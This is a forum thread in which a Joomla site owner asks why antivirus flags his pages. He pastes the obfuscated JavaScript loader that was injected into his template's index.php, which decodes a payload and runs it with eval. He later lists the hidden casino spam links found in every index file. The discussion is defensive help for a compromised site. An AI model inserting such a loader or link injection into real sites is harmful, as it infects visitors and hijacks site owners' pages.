AVG reports JS Downloader Agent as virus
-
-
- Doug Martin
- Jr. Rocketeer
- Posts: 21
- Thanks: 0
-
When I browse to certain pages at my newly launched Joomla_RT_Firenzie_j15 site I get AVG vuris messages.
Virus identified JS/Downloader.Agent
Virus found JS/Psyme
AVG reports the object is in my local settings/temporary Internet files/content.ie5/odohapoh\184(1).HTMes
How can I get rid of these?
Has somone infected my web site?
I have also found my index.php file has been modified at a different site. Lots of links at the end of the file.
Has someone hacked my ftp user id and passwords?
How can somone modify my index.php file?
I found the following in my index.php near the end of the file.
<script language=JavaScript>function cfbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,23,28,4,36,19,49,5,43,8,0,0,0,0,0,0,62,33,58,34,45,41,3,42,38,22,18,32,31,59,20,6,61,51,29,16,40,26,47,1,44,9,54,0,0,0,0,27,0,37,24,2,13,50,56,30,52,14,25,46,10,12,17,53,0,55,57,39,60,35,7,21,11,48,15);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(159^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}cfbn15('T_LtMFzB6e@B@VkBXxlk_FLtBuxEMFz0GxV@6VgXTqkP880DfiGPrqk0e80V6MVtBxB@M8zG0egMtxUVqV@BV1lXyB0@Mx_0QFz0hx_@Zz0BBqgX680BykiXKCxDJM0Bqv_My8gtML8h@V@P6Zk06VzteL8DogGEVHGDhCM@M8zGfJxkP@xBZV0BqxG8DZBVq8VPfL0BCCl80e@BHzV@CZM@ZQ@MQMVraOzt68LVAilXZsLM@xV@AC8D') </script> - Last Edit: 16 years 7 months ago by Doug Martin.
-
-
-
- James Spencer
- Preeminent Rocketeer
- Posts: 46340
- Thanks: 50
- It is probably that you have been hacked, restore from a backup and check out the Security forums at Joomla.org
- James Spencer / Developer & Support / Hull, UK
-
-
-
- Doug Martin
- Jr. Rocketeer
- Posts: 21
- Thanks: 0
-
FYI, for anyone else that has these security problems I found that the template's index.php file had been hacked along with the login.php files. I compared with the original to find the differences. After replacing those files I removed the admin user and installed a security plugin.
Both files contained <script language=JavaScript>function....
I wonder if you did a global search for this string in all the PHP files how many times this would turn up?
Turns out it showed up in other templates login.php and administrator/index3.php files?
Does anyone know what these java scripts do?
-
-
-
- Doug Martin
- Jr. Rocketeer
- Posts: 21
- Thanks: 0
-
It turns out every index.html and index.php contained the java script
<script language=JavaScript>function eglhbn15(p).... along with some of the following
<a href=" www.papas-casino.com/webalizer/css/?q=789 ">online casinos</a>
<a href=" www.papas-casino.com/webalizer/css/?q=4031 ">online casino law</a>
</marquee>
<marquee direction="left" loop="10" scrollamount="10000">
<a href=" www.papas-casino.com/webalizer/css/?q=3513 ">playtech online casino</a>
<a href=" www.papas-casino.com/webalizer/css/?q=5277 ">14 casino july online pings trackback</a>
<a href=" www.papas-casino.com/webalizer/css/?q=3772 ">tournament blackjack online</a>
-
Time to create page: 0.051 seconds